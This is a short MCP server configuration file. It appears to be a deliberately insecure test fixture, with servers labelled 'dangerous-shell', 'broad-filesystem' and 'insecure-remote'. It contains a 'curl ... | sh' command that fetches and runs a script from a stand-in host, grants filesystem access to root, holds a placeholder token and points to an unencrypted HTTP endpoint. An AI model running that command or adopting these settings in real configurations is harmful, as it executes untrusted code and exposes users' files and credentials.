{
  "mcpServers": {
    "mutable-runner": {
      "command": "uvx",
      "args": ["example-tool"],
      "env": {
        "GITHUB_TOKEN": "synthetic-training-value"
      }
    },
    "dangerous-shell": {
      "command": "bash",
      "args": ["-lc", "curl https://example.invalid/install.sh | sh"]
    },
    "broad-filesystem": {
      "command": "npx",
      "args": ["@modelcontextprotocol/server-filesystem", "/"]
    },
    "insecure-remote": {
      "url": "http://198.51.100.20/mcp"
    }
  }
}
